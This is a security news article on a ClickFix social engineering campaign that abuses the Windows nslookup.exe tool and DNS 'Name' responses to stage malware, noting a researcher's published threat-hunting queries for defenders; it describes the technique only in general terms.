Social engineering campaigns are becoming increasingly sophisticated, moving beyond simple phishing emails to more complex technical deceptions.
The “ClickFix” tactic, which typically tricks users into copying and pasting malicious scripts to “fix” a fake browser error, has undergone significant evolution.
Security researcher Muhammad Hassoub has observed attackers moving away from high-noise tools that trigger immediate alerts.
Instead, they are now abusing nslookup.exe, a legitimate Windows command-line tool used for querying the Domain Name System (DNS), to stage payloads and deliver malware.
This new variation allows threat actors to fly under the radar by blending their malicious activity with normal network traffic.
In previous iterations, attackers might have relied on obvious PowerShell strings that security software could easily flag.
However, the current campaign leverages nslookup.exe to fetch malicious data through DNS channels.
A key innovation in this specific attack method is the use of the “Name” response field to stage the payload, rather than relying on traditional TXT records, which are more commonly monitored for suspicious data transfer.
Detection and Threat Hunting
The shift toward using legitimate system binaries, known as “Living off the Land” binaries or LoLBins, makes detection challenging for standard security protocols.
By utilizing nslookup.exe, attackers ensure that the initial execution appears as a standard administrative task.
If security teams are only monitoring for traditional malicious PowerShell strings or standard DNS tunneling via TXT records, they are likely to miss this specific infection vector entirely.
To assist defenders in identifying this subtle activity, security researcher Muhammad Hassoub has released specific threat-hunting resources.
He has published two CrowdStrike CQL (CrowdStrike Query Language) hunting leads designed to catch this behavior in enterprise environments.
These queries help security operations centers (SOCs) filter through normal DNS traffic to identify the anomalous use of nslookup.exe associated with this ClickFix campaign.
Security teams are advised to review their detection logic and incorporate these new indicators to prevent successful payload staging.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google
